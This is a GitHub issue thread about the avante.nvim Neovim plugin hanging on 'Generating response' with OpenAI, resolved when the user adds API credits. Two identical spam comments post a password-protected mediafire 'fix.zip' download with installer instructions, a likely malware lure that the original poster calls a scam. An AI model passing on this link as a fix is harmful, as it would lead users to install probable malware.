### ISSUE TITLE
OpenAI stuck on "Generating response"

### ISSUE THREAD

**Issue by Kamyil** [yetone/avante.nvim#240]
I have the same issue as mentioned here https://github.com/yetone/avante.nvim/issues/211, but with OpenAI. 
My config (lazy):

```lua
return {
  "yetone/avante.nvim",
  event = "VeryLazy",
  build = "make BUILD_FROM_SOURCE=true luajit",
  opts = {
    provider = "openai",
  },
  dependencies = {
    "nvim-tree/nvim-web-devicons", -- or echasnovski/mini.icons
    "stevearc/dressing.nvim",
    "nvim-lua/plenary.nvim",
    "MunifTanjim/nui.nvim",
    --- The below is optional, make sure to setup it properly if you have lazy=true
    {
      'MeanderingProgrammer/render-markdown.nvim',
      opts = {
        file_types = { "markdown", "Avante" },
      },
      ft = { "markdown", "Avante" },
    },
  },
}
```

It's also stuck on "Generating response"
- It doesn't throw any tiktoken error (assuming it properly build it since in lazy panel i was seeing the logs that it was compiling something)
- It properly recognizes my key from shell file (and doesn't ask about the key on nvim startup)
- The panel itself is working and I can trigger the prompt, but it stucks on "Generating response"
- I'm not moving cursor after triggering

![image](https://github.com/user-attachments/assets/2fc5471b-5327-4083-867e-521e1cd0ff6a)
```
    ● avante.nvim 10.75ms  VeryLazy
        dir    .../.local/share/nvim/lazy/avante.nvim
        url    https://github.com/yetone/avante.nvim
        branch main
        commit 26409d9
        readme README.md
        event   VeryLazy 
```
Neovim version: 
```
NVIM v0.10.1
Build type: Release
LuaJIT 2.1.1720049189
```

OS: macOS 14.6.1 23G93 arm64
Shell: zsh 5.9

Highly appreciate your work btw!

**Comment by TerminatedGA** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Kamyil** [comment]
https://github.com/yetone/avante.nvim/issues/240#issuecomment-2310097754

Wow, didn't know there are scam comments in Github as well

**Comment by aarnphm** [comment]
Do you have credits on openai? It seems to load just find for me?
<img width="483" alt="Screenshot 2024-08-26 at 08 45 23" src="https://github.com/user-attachments/assets/079090ae-84c3-4b35-9ba0-01e9888245c9">

**Comment by Kamyil** [comment]
Yeah, my bad. Didn't know that default premium subscription for ChatGPT is a completely different thing with different billing than in platform.openai.com
I've added some minimal credits and it started working 

Now it works, thank you, issue can be closed
![image](https://github.com/user-attachments/assets/0168d761-9e9f-4ce3-ba7c-3989520599bf)

**Comment by aarnphm** [comment]
yep chatgpt is different from developer API :)

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
